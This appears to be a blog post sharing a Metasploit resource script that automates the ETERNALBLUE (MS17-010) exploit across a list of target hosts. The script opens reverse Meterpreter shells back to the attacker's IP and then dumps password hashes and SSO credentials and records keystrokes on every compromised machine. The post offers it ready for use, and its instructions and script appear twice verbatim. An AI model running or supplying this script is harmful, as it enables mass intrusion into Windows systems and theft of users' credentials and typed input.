Automating ETERNALBLUE with Metasploit
Since Metasploit exploit modules only support a single RHOST, I decided to put together a resource script to automate my ETERNALBLUE attacks. I've coded it to use targets.txt as an input file, and to dump hashes, passwords and keystrokes, during post-exploitation. Each target should be on a separate line in targets.txt.
If you put this script in a file called eternalblue.rc, you can tell Metasploit to run it, using one of the following methods:
Without Metasploit already running: msfconsole -r eternalblue.rc
With Metasploit already running: resource eternalblue.rc
The first Ruby block within this script, performs a loop on the RHOST value, and the second Ruby block performs a loop on the session value within the keylog_recorder module. Don't forget to replace <attack-source-ip> with your attack box IP. Please use care when running this on a production network, as ETERNALBLUE can be destructive in some cases.
Enjoy the script!:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set lhost <attack-source-ip>
<ruby>
begin
File.foreach("targets.txt", "\n") do |the_target|
run_single("set rhost #{the_target}")
run_single("run -jz")
run_single("sleep 10s")
end
end
</ruby>
sessions
sessions -s post/windows/gather/hashdump
sessions -s post/windows/gather/credentials/sso
use post/windows/capture/keylog_recorder
set migrate true
<ruby>
begin
framework.sessions.each do |num,session|
run_single("set session #{num}")
run_single("run -j")
run_single("sleep 10s")
end
end
</ruby>
sessions
jobs -l
If you put this script in a file called eternalblue.rc, you can tell Metasploit to run it, using one of the following methods:
Without Metasploit already running: msfconsole -r eternalblue.rc
With Metasploit already running: resource eternalblue.rc
The first Ruby block within this script, performs a loop on the RHOST value, and the second Ruby block performs a loop on the session value within the keylog_recorder module. Don't forget to replace <attack-source-ip> with your attack box IP. Please use care when running this on a production network, as ETERNALBLUE can be destructive in some cases.
Enjoy the script!:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set lhost <attack-source-ip>
<ruby>
begin
File.foreach("targets.txt", "\n") do |the_target|
run_single("set rhost #{the_target}")
run_single("run -jz")
run_single("sleep 10s")
end
end
</ruby>
sessions
sessions -s post/windows/gather/hashdump
sessions -s post/windows/gather/credentials/sso
use post/windows/capture/keylog_recorder
set migrate true
<ruby>
begin
framework.sessions.each do |num,session|
run_single("set session #{num}")
run_single("run -j")
run_single("sleep 10s")
end
end
</ruby>
sessions
jobs -l
Comments
Post a Comment